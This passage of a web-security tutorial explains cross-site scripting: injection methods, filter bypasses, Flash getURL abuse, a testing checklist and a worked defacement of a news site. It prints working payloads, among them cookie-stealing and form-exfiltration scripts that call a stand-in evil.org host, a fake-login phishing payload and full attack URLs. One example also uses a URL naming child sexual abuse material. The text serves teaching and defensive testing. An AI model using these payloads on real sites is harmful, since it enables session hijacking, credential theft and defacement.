* code = Specifies the class name of the code to be executed (required).
* codebase = The URL from which the code is retrieved.
* name = Names the applet for reference elsewhere on the page.
Supported by: Netscape, IE 3+, HTML 4

<EMBED>
Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <object> tag.
Attributes:
* hidden = Hides the media file or player from view when set to yes.
* name = Specifies the name for the embedded object for later reference within a script.
* pluginspage = Specifies the URL for information on installing the appropriate plug-in.
* src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only)
* code = Specifies the class name of the Java code to be executed. (IE only)
* codebase = Specifies the base URL for the application. (IE only)
* pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only)
* type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only)
Supported by: Netscape, IE 3+, Opera 3+

<FORM>
Indicates the beginning and end of a form.
Attributes:
* action = Specifies the URL of the application that will process the form.
* enctype = Specifies how the values for the form controls are encoded when they are submitted to the server.
* method = Specifies which HTTP method will be used to submit the form data.
* target = Specifies a target window for the results of the form submission to be loaded (_blank, _top, _parent, and _self).
Supported by: All

Malicious Code

An embedded code attack is heavily dependent upon the delivery mechanism. Thus the delivery method often dictates the audience the script will potentially affect.
It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Board Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and, later, the use of vector drawing languages that permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt a long time ago to rigorously control the content that could be submitted.

An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user-submitted text from a standard POST form. This data was then added to the discussion page without any further processing. Users often included text formatting tags to bold, italicise or colour their text, giving their message greater visual impact. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider a user embedding either of the following two code snippets in their posting, and what the implications would be for everyone viewing the message.

    Hello World! <SCRIPT>malicious code</SCRIPT>
    Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">

Unfortunately, attackers are finding ever more ingenious methods of encoding their embedded attacks, and consequently many more sites are vulnerable.

Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes the malicious code. The site sends a page back to the browser including the value of criteria, which consequently forces the execution of code from the evil attacker's server.
For example:

    <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>">Go to trusted.org</A>

In the attack above, one source is inserting code into pages sent by another source. It should be noted that this attack:
* disguises the link as a link to http://trusted.org,
* can be easily included in an HTML email message,
* does not supply the malicious code inline, but downloads it from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.

This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS).

Cross Site Scripting

A cross-site scripting vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system. "Cross-site" refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim's browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions, which can result not only in cookie theft but also in account hijacking, changing of web application account settings, spreading of a webmail worm, etc.

Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.

The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines.
Additionally, a victim doesn't necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.

The most popular (and devastating) CSS/XSS attack is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A paper by iDefence explains the process in great detail, but it can be quickly summarised as follows:

1. The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session IDs.
2. The attacker finds a CSS vulnerable page on the site, for instance http://trusted.org/account.asp.
3. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.
4. Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker. For instance:
    <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
5. Unknown to the victim, the attacker has now received a copy of their cookie information.

The attacker now visits the web site and, by substituting his cookie information with that of the victim, is now perceived to be the victim by the server application.

Note that cross-site scripting is commonly referred to as CSS and/or XSS.

Understanding Code Insertion

To date, security professionals have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications.
The following are some of the more common methods for doing so.

Inline Scripting

    http://trusted.org/search.cgi?criteria=<script>code</script>
    http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>
    http://trusted.org/COM2.IMG%20src="Javascript:alert(document.domain)"

Forced Error Responses

    http://trusted.org/<script>code</script>

This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data.

    http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>

If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the user's browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request.

    http://trusted.org/servlet/org.apache.catalina.servlets.WebdavStatus/<script>code</script>

In the example above, when the Tomcat servlet is called with the trailing illegitimate request, an error page is served containing the offending text verbatim.

Non <SCRIPT> Events

    " [event]='code'

In many cases it may be possible for an attacker to insert an exploit string, with the above syntax, into an HTML tag that should have been like:

    <A HREF="exploit string">Go</A>

resulting in:

    <A HREF="" [event]='code'">Go</A>

For example:

    <b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>

As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed.

JavaScript Entities

    <img src="&{alert('CSS Vulnerable')};">

The special characters "&{" are sometimes interpreted as the start of a new JavaScript code segment (entity).
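The attribute break-out described under Non <SCRIPT> Events can be reproduced with a few lines of string handling. The sketch below is illustrative only: unsafeLink, saferLink and escapeAttribute are hypothetical names, and the exploit string simply substitutes onMouseOver and alert(1) for the [event] and code placeholders used above.

```javascript
// Hypothetical helper: encodes the characters that could terminate a
// quoted attribute value or open a new tag.
function escapeAttribute(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Builds the tag by plain concatenation, as a vulnerable page would.
function unsafeLink(href) {
  return '<A HREF="' + href + '">Go</A>';
}

// Builds the same tag, but encodes the value first.
function saferLink(href) {
  return '<A HREF="' + escapeAttribute(href) + '">Go</A>';
}

// Exploit string in the form: " [event]='code'
const exploit = "\" onMouseOver='alert(1)'";

console.log(unsafeLink(exploit));
// <A HREF="" onMouseOver='alert(1)'">Go</A>
console.log(saferLink(exploit));
// <A HREF="&quot; onMouseOver=&#39;alert(1)&#39;">Go</A>
```

In the first result the quote closes the HREF value early and the event handler becomes a separate attribute; in the second the whole string stays inside the attribute value. Encoding of this kind does not stop a value that is itself a javascript: URL, which would need a separate check on the URL scheme.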
Typical Payloads Formatting

    <img src="malicious.js">
    <script>alert('hacked')</script>
    <iframe src="malicious.js">
    <script>document.write('<img src="http://evil.org/'+document.cookie+'">')</script>
    <a href="javascript:">click-me</a>

Insertion Example: Dynamic URL Generation

Consider an application built for running on Microsoft's Internet Information Server (IIS) web server platform. Dynamic content is delivered through IIS's Active Server Pages (ASP).

Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows:

    <A HREF="http://trusted.org/search_main.asp?searchstring=SomeString">click-me</A>

and the ASP code required to generate a further query based upon this submitted information is:

    <%
    var BaseUrl = "http://trusted.org/search2.asp?searchagain=";
    Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>")
    %>

If the attacker were to replace "SomeString" with their own code, as indicated next:

    <a href="http://trusted.org/search_main.asp?SearchString=%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%2Esubmit%3B%27">FooBar</a>

The likely result found in the dynamically generated ASP page will be:

    <A HREF="http://trusted.org/search2.asp?searchagain="" onmouseover='ClientForm.action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm.submit;'">click-me</A>

In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attacker's web site.

Bypassing Anti-CSS Filters

A key function of any application filtering process will be the removal of possibly dangerous special characters. However, in many circumstances it may be difficult to filter a large range of these characters due to the application's unique requirements.
Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different ways in which special characters can be encoded.

One of the most popular alternative character representations is HTML escaped encoding (URL percent-encoding), sometimes mistakenly referred to as Unicode encoding. In this system, the HEX value of the ASCII character is prefixed with the "%" character.

Char   ;    /    ?    :    @    =    &    <    >    "    #
Code  %3b  %2f  %3f  %3a  %40  %3d  %26  %3c  %3e  %22  %23
Char   {    }    |    \    ^    ~    [    ]    `    %    '
Code  %7b  %7d  %7c  %5c  %5e  %7e  %5b  %5d  %60  %25  %27

To better understand the processes behind bypassing Anti-CSS filtering mechanisms, a series of detailed examples are provided below.

Inserting Malicious Code

Simple Filtering of < and >

Many applications that implement some kind of content filtering will typically filter out the "<" and ">" characters at the client-side. At first glance, this looks like an effective way of ensuring <script> type HTML tags are not possible. Unfortunately, not only is client-side code easy to bypass, in many circumstances the filter itself can be bypassed using a mix of alternative character representations and other special characters.

Consider a routine that removes the "<" and ">" special characters:

    document.write(cleanSearchString('<>'));

The attacker now uses an alternative coding for the filtered characters, \x3c and \x3e respectively, and initialises their code with ') + to escape out of the routine.

    ') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'

Commenting out malicious code

Consider an application that filters content on behalf of its clients by causing any scripting content to be safely commented out. For instance, <script>code</script> is filtered by the application to become:

    <COMMENT>
    <!--
    code (NOT PARSED BY FILTER)
    //-->
    </COMMENT>

Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example, the attacker can send the following code:

    <script>
    - -->
    </COMMENT>
    <img src="http://none" onerror="alert(document.cookie);window.open('http://evil.org/fakeloginscreen.jsp');">
    </script>

After processing by the filter, the following code is embedded in the returned document:

    <COMMENT>
    <!--
    - -->
    </COMMENT>
    <img src="http://none" onerror="alert(document.cookie);window.open('http://evil.org/fakeloginscreen.jsp');">
    </COMMENT>

This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML email content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords.

Separate Window Handling

A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window, using the target="_blank" addition to the HTML <A HREF> tag. This then causes any malicious code to be executed in the context of a different DOM. Unfortunately, in many online email applications it is possible to bypass this after analysing the "harmless" link supplied by the site.

Consider a site that parses the content,

    <a href="javascript:">click-me</a>

which, after processing, becomes:

    <a href="javascript:" target="_blank">click-me</a>

causing the URL to be opened in a new window. However, if the attacker constructs his HREF as follows,

    <a href="javascript:..." foo="bar>click-me</a>

it will be interpreted as:

    <a href="javascript:..." foo="bar target="_blank">click-me</a>

causing the code to be executed in the same page, under the same DOM.

Escaped JavaScript Entities

In cases where almost all special characters are filtered from user-supplied strings, attackers must encode the entire attack string.

Consider the following URL:

    http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL%27%29%7d%3b&apropos=pos2

The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing, in this instance, an unexpected JavaScript alert window to pop up with the text "EVIL".
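The decoding step in the Escaped JavaScript Entities example can be checked directly. The sketch below uses the standard decodeURIComponent function; containsSpecialCharacters is a hypothetical stand-in for a filter that looks for special characters, included only to show why the order of decoding and filtering matters.

```javascript
// The encoded query value from the URL above.
const encoded = "%26%7balert%28%27EVIL%27%29%7d%3b";

// Standard percent-decoding, as a server would apply to the query string.
const decoded = decodeURIComponent(encoded);
console.log(decoded);
// &{alert('EVIL')};

// Hypothetical filter: reports whether any commonly abused special
// character is present in the text it is given.
function containsSpecialCharacters(text) {
  return /[<>&{}()'";]/.test(text);
}

console.log(containsSpecialCharacters(encoded)); // false
console.log(containsSpecialCharacters(decoded)); // true
```

A filter applied to the raw request text sees nothing suspicious, while the same filter applied after decoding does, which suggests that input should be checked in the form the application will actually use.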
Web Integration

As client web browsers have evolved, they have incorporated an increasingly diverse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of these same browsers. While the security flaw may be HTML injection, and more specifically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, a popular personalised delivery mechanism has now become HTML email. Unfortunately, the delivery methods are becoming so diverse that no single security solution is available to prevent the attack. Consider the significance of the following delivery mechanisms.

The Flash! Attack

Flash! is a popular application for displaying animated visual information. It has its own development language (ActionScript) for creating sophisticated interactive menus, animated movies and games. The most popular web browsers often install the interpreter for these files by default and, due to the large number of sites that use the technology, many people will install the interpreter even if it wasn't originally available with their web browser.

ActionScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser.

For instance, instead of:

    getURL("http://www.technicalinfo.net")

it is possible to specify scripting code:

    getURL("javascript:alert(document.cookie)")

Thus, it is possible to embed potentially dangerous scripting elements within a common file format.
The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script> type tags) and local web browser security settings.

For an attack to be successful, the dangerous Flash! file (typically terminating in a .swf extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for instance:

    <EMBED src="http://evil.org/badflash.swf"
      pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
      type="application/x-shockwave-flash"
      width="100" height="100">
    </EMBED>

The Impact

The impact of malicious code insertion is often difficult to quantify and will change as new functionality or interactions are incorporated into both web servers and client browsers. Already, users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail or instant messages, or any other application capable of displaying HTML content (e.g. Microsoft Help). For this reason, a series of examples best illustrates the diversity and impact of potential threats.

Consider the following examples:
* An attacker often has access to the document retrieved, since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.
* An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.
* An attacker may be able to poison the site's persistent cookies, thus modifying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and executed each time the site dynamically generates page content without the correct processing.
* An attacker may be able to cause a hidden window to start on the client machine and use this to key-log all browser interaction of the victim. Should the victim later visit sites requiring authentication, the attacker could harvest this information.
* CSS type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attacker's code unintentionally. If the attacker references document components on a remote host, the victim's client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on an SSL-capable web server.
* An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.
* An attacker may be able to bypass policies that prevent the victim's browser from executing scripts. For example, Internet Explorer security zones may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.
* An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may cause the execution of the malicious code on the help-desk system.
* Even if the victim's web browser does not support scripting, an attacker may still be able to alter the content of the page, affecting its appearance, behaviour or normal operation.

To date, the most popular application content to be targeted by attackers has been web pages that:
* Return results based upon user input to search engines,
* Process credit card information,
* Store user-supplied content in databases and cookies for later retrieval.

Vulnerability Checking

Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has been frequently used in the past.

1. For each visible input field (these may be located in an HTML form, or represented in the URL as "variable="), try the most obvious scripting formats:
    <script>alert('CSS Vulnerable')</script>
    <img csstest=javascript:alert('CSS Vulnerable')>
    &{alert('CSS Vulnerable')};
In any case, should an alert message pop up with the text "CSS Vulnerable", the application component is vulnerable, specifically the input field just checked.
2. If any of the above scripting checks causes the HTML page to display incorrectly, the application component may still be vulnerable.
3. For each visible variable, submit/substitute the following string:
    '';!--"<CSS_Check>=&{()}
(Note that the string begins with two single-quotes.) On the resultant page, search for the string "<CSS_Check>". If you discover "<CSS_Check>", it is quite probable that the application component is vulnerable. However, if the angle brackets around CSS_Check have been replaced by something similar to "&lt;CSS_Check&gt;", then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload.
4. Having located the word "CSS_Check", verify what (if any) other characters have been altered or filtered from the original string '';!--"<CSS_Check>=&{()}. Depending upon the filtered characters, the application component may still be vulnerable.
5. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above), then there is a high probability that the application component is vulnerable.
6. Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Security group or WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application.
7. In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data. It is a simple process to turn a POST into a GET submission. If the application component fails to respond to the GET the same way as it did for the POST submission, it is probably not vulnerable to a URL based inline scripting attack.

Putting It All Together

To bring together many of the ideas and processes discussed earlier in this document, a worked example is useful. In this example, the anonymous site has a search engine that responds to client data submissions. Normally the site would look like this:

In our first test, we try submitting our first test string <script>alert('CSS Vulnerable')</script>, and receive the following response:

Notice the strange response in the "Your Search" box on the left. Zoomed in below.
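The reflection check from steps 3 and 4 of Vulnerability Checking lends itself to a small script. The following is only a rough sketch under stated assumptions: classifyReflection and the sample page fragments are hypothetical, and a real check would also need to examine which of the other probe characters survived and where in the page they appear.

```javascript
// The probe string from step 3 (it begins with two single-quotes).
const PROBE = "'';!--\"<CSS_Check>=&{()}";

// Hypothetical helper: reports how the probe was reflected in a page.
function classifyReflection(html) {
  if (html.includes(PROBE)) return "entire probe unfiltered";
  if (html.includes("<CSS_Check>")) return "tag unfiltered";
  if (html.includes("&lt;CSS_Check&gt;")) return "entity-encoded";
  if (html.includes("CSS_Check")) return "altered";
  return "absent";
}

// Illustrative page fragments, not taken from any real site.
const samples = [
  '<INPUT NAME="q" VALUE="' + PROBE + '">',
  "Results for &#39;&#39;;!--&quot;&lt;CSS_Check&gt;=&amp;{()}",
  "Results for CSS_Check",
  "No results found",
];

for (const page of samples) {
  console.log(classifyReflection(page));
}
// entire probe unfiltered
// entity-encoded
// altered
// absent
```

The first two outcomes correspond to the "quite probable" and "may not be vulnerable" cases of step 3; the "altered" case is the one that step 4 asks the tester to inspect by hand.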
Taking a closer look at the content source, we notice that our sample code appears 21 times in the document, in various formats.

It appears 10 times in a format similar to:

   <SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>

9 times in a format similar to:

   <a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript%3E&pager.offset=10">2</a>

And twice in a format similar to:

   document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');

Evidently there are three different server-side routines for processing client search data.

1. In the first type (ad.uk.doubleclick.net format), it appears that the processing routine converts characters to lower case and changes white space to the underscore (_).
2. The second type (href=) converts special characters into their escape-encoded formats, and white space into the + character.
3. The third type (document.writeln) places the complete string within a document.writeln JavaScript routine.

Several opportunities present themselves here. To make the site execute the JavaScript alert box for each type, we need to force the <script> tags outside of any other HTML tags. Thus, for each type, the following methods will work:

1. ><script>alert('CSS Vulnerable')</script><b a=a
2. a></a><script>alert('CSS Vulnerable')</script>
3. \'><script>alert%28\'CSS Vulnerable\'%29</script><

The result is the following alert box (multiple times):

However, for this example, we shall focus on the last type (document.writeln). Since it is possible to inject code into the HTML page returned by the anonymous news site, to make the attack interesting, we shall write our own fake news article.
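The three reflection formats observed above can be reproduced with a short sketch, which may help when reasoning about which characters each routine leaves intact. The functions below are hypothetical stand-ins inferred only from the observed output; the site's real server-side code is unknown.

```python
# Hypothetical models of the three server-side routines, inferred from
# the reflected output only. They are not the site's actual code.
from urllib.parse import quote_plus

SAMPLE = "<script>alert('CSS Vulnerable')</script>"


def ad_tag_format(value: str) -> str:
    """Type 1: lower-case the input and turn white space into underscores."""
    return value.lower().replace(" ", "_")


def href_format(value: str) -> str:
    """Type 2: escape-encode special characters, white space becomes +."""
    return quote_plus(value)


def writeln_format(value: str) -> str:
    """Type 3: the string is placed in the page unchanged."""
    return value


if __name__ == "__main__":
    for routine in (ad_tag_format, href_format, writeln_format):
        print(routine.__name__, "->", routine(SAMPLE))
```

Under these assumptions, the first and third models leave < and > untouched, while the second encodes them.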
Due to the maximum length of any string we can send to the site, and the likely length of the fake news article, we shall create a JavaScript include file (.js) which we will load into the page using:

   \'><script%20src%3dhttp://evil.org/faked.js></script>

In this example, the include file will use multiple document.write statements to create the fake news article. The key features of the include file are:
* Use of HTML <DIV> tags to position the content on the page. Doing so allows the attacker to cover over existing content as they wish.
* Use of a table to keep all the article text together.
* Rewriting of the URL source field at the top of the browser.
* Rewriting of the browser status bar.

From the first few lines of the faked.js file:

   var d = document;
   d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2"> <TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
   d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');

So far, everything we have tested on the site makes use of the existing form to submit the attacker's code. This submission is done by an HTTP POST command, such as:

   POST /Search HTTP/1.0
   Referer: http://www.anonymous.com/Search
   Accept-Language: en-gb
   Content-Type: application/x-www-form-urlencoded
   Host: www.anonymous.com
   Content-Length: 135
   Pragma: no-cache

   dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT&searchOption=articles

It is a simple process to convert the HTTP POST into a single URL. Unfortunately for the anonymous news site, the web application does not differentiate between the methods of receiving data. Thus the following attack URL allows the attacker to place his own content on the site.

   http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT&searchOption=articles
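The POST-to-GET conversion described above amounts to moving the form-encoded request body into the query string of the form's action URL. A minimal sketch for use when testing your own application follows; the function name post_to_get_url is hypothetical, and the q value in the usage example is a harmless placeholder, not the attack string.

```python
# Minimal sketch: rebuild an application/x-www-form-urlencoded POST as
# a GET URL. The body is assumed to be already form-encoded.
from urllib.parse import urlsplit, urlunsplit


def post_to_get_url(action_url: str, form_body: str) -> str:
    """Append the form-encoded POST body to the action URL's query string."""
    parts = urlsplit(action_url)
    # Preserve any query string the action URL already carries.
    query = parts.query + "&" + form_body if parts.query else form_body
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, ""))


if __name__ == "__main__":
    body = "dropnav=Pick+a+section&q=test&newSearch=true&pro=IT&searchOption=articles"
    print(post_to_get_url("http://www.anonymous.com/Search", body))
```

If the application returns the same page for the resulting URL as it did for the original POST, it does not differentiate between the two methods, which is the condition noted in step 7 of the checking process.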